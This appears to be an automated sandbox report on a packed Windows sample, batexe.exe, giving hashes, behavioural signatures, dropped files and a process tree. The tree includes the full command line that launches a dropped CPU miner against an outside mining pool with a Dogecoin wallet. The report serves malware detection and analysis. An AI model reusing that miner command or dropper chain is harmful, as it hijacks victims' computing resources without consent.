73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
292s
max time network
303s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
22-02-2024 06:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1856	b2e.exe
2584	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2584	cpuminer-sse2.exe
2584	cpuminer-sse2.exe
2584	cpuminer-sse2.exe
2584	cpuminer-sse2.exe
2584	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4516-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4516 wrote to memory of 1856	4516	batexe.exe	74
PID 4516 wrote to memory of 1856	4516	batexe.exe	74
PID 4516 wrote to memory of 1856	4516	batexe.exe	74
PID 1856 wrote to memory of 688	1856	b2e.exe	75
PID 1856 wrote to memory of 688	1856	b2e.exe	75
PID 1856 wrote to memory of 688	1856	b2e.exe	75
PID 688 wrote to memory of 2584	688	cmd.exe	78
PID 688 wrote to memory of 2584	688	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4516
- C:\Users\Admin\AppData\Local\Temp\BA47.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\BA47.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\BA47.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BEAC.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:688
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\BA47.tmp\b2e.exe

Filesize
8.0MB

MD5
7279634f0e380860d67384613122a9b4

SHA1
5d0537b4005e31cc6f7a80cadd7ff60c58ba945c

SHA256
36f68e917f927c17c9e1aaf09c4f5daa592475d037272aeec658689c7a571678

SHA512
ab5ccebcc50e9af826b72764aed37a688c5a142badd8ce5ea388f9661ff373cd67ca4a7006f1217fb261fbe4c6454e369012caadc8ad2d0d6f7a874462800bac

Download Submit
C:\Users\Admin\AppData\Local\Temp\BA47.tmp\b2e.exe

Filesize
6.2MB

MD5
3895d468c971fc0e777c38eefb977764

SHA1
d2ce65cd94478bda13e72418cf85745bc0692553

SHA256
fbe733c6b15d866887417f3e614391b18f5bf19b20b65c3217ce574191334dfb

SHA512
a1fe8060b1c885ae7a573e27f5a1bc016090a66c32f903af8e9cca4a4244e169113006970aedd276a60236b502c766746133bc490c948ce49a44b5b507cb4a51

Download Submit
C:\Users\Admin\AppData\Local\Temp\BEAC.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
832KB

MD5
43dd8ab1a0fd7f177db516faa81a9635

SHA1
66a8b6940797f3396a4f1a6deafca1fda5bffcdd

SHA256
d4b58fa7e09511b58f312b57e2067823a7f31ff5cd6369cbf5ef3667c27b60ea

SHA512
064753e38fb6e2d64a8ce067a52c24b55eb11cf714a534f3557a0e2bd2f5fba16030d8496c7787f4b272ae6a696f4b017d99771488832d12711a7158c927f772

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
576KB

MD5
6e18fc4eda8ed0e6aa6ed56f84803ab3

SHA1
e4a0a4432fcf3184baae1b01a8cb771ed580dbe2

SHA256
f51cf1f35d722b4af4bde30de5008d67d7256d271953eeb2ff63780978f4a53f

SHA512
25f97a3a07fd0aed4a5e6bd58e4cc3ebc2c56c0a314103536e9342ee10aa3c01baa24b459fb58d7154808594203e2b4fddc23f6c424182e2e8bb3a978b4dc256

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
384KB

MD5
d1d1f36cdbccda3b96e8c164afb74526

SHA1
91bafcd404c8568c9a195ec8cbf9592ea9e17e8b

SHA256
ea6e726150aa9a8dcf9ccb6a991440b451f9f2dcc46d93cb35971556879d1d03

SHA512
2306e6578ba2217b4f32913e1ac35e0547723b873c11244e96affd05457945373c621ea16a82e1e3aa1a177e3059efc40c8585118c63a3ea145524c51d1d18c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
13.4MB

MD5
f5ba2effc9a27ad33cea5bc813199402

SHA1
a968406ff8328860ac1c4270cd7a35d0da003611

SHA256
835680b05bde39ff59a2755e842ef359496976adcaf531af25900eaab846f2de

SHA512
2807d465c5a88a5913a9a4da40e42d1c47f982abfd2143cf406995d86b16b27b395d744a365723c3edf536db592d70ba9fd1df14273d28808d9e50bb4ff1ab75

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
320KB

MD5
1ae43cc09627ff82d15527ea2693fd76

SHA1
c39ffa1a4b80c29fa1f5caed3e7d091253266c66

SHA256
b63980c9d592a6d0d8521f74bd4c6f7cc4ae5f8c3320d2bd63764c56648ac45f

SHA512
21945e4e2fad3ee2b2a19d19bbbc1ada832c33a0d3bf499d6ac8f093b39021323ea0f7df3d54167a3456cbaf01ff126a6e6abbe17dd4eb8d5a24ca000888c271

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
320KB

MD5
c911df8bf8c66277e14360319b0b93b7

SHA1
598c59c0e7cbecb788ee676db218dc0faaa39bdc

SHA256
4c53941f04ddeae2179047a1c7f8c7f7f46af0f08c424ab66d61f2316f2ee77d

SHA512
13aeae87ee52f22d1c928c99c66e116254cde630c09f90b146962fa61276af13fef653b7a66184d00d614f0379750e641c2e62326ebb5588ca632e56c935d77c

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
8.0MB

MD5
0a6fbe35b0f4eb46671fdbbd8d60c2bb

SHA1
37d5ca0332e2f0c586141f3afe02d8ef2073c7ec

SHA256
fdb1abd2dd33c168a5d6f05bab744d0f924d9e26d799f590c81a2598925fd42c

SHA512
45464f0e736b9766b1b06ce23ddd07dc9e50e995ac55e7d434785c4558deeca6a8fda96a0b1e29e7c435c8184b41e34c14e196714aad1c576ffd606d45695aa8

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
2.2MB

MD5
011b9b6f5e88b52191b2ab2da44890c3

SHA1
44ba776a960f1f8389dc12725b5779ca6081a340

SHA256
2f8c12728cc2ac5a26f6b812f52db781b6e2db4013b502aaf871cbf7218aea7e

SHA512
f563602a45887d490d419878fe015a1935201b7b8a2a60f7b9bdcae64c948e26db32cd3b8b7f7c6e32473169f582524adfb70484057347e9da35976a4a8edf95

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
256KB

MD5
eca0c37eee65c31b869788d5d0bf00cd

SHA1
33a5c0cd2f0a7296a5c0169699ed8e065b57e5e8

SHA256
1d2b7bd4ddd99d627d5111252baadf028dc9910cf414892867502e5951de962e

SHA512
5f302da7772fca0a6d03ffd8732850f526acf5fcc33e189d2d906a33101454d970d5cca2f829a006d15c4a857341d72c7876cb2e7af84ada4f158695aba5a4dc

Download Submit
memory/1856-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1856-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2584-42-0x000000005E7B0000-0x000000005E848000-memory.dmp

Filesize
608KB

Download
memory/2584-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2584-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2584-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2584-44-0x0000000000F20000-0x00000000027D5000-memory.dmp

Filesize
24.7MB

Download
memory/2584-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2584-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2584-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2584-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2584-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2584-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2584-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2584-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2584-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4516-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download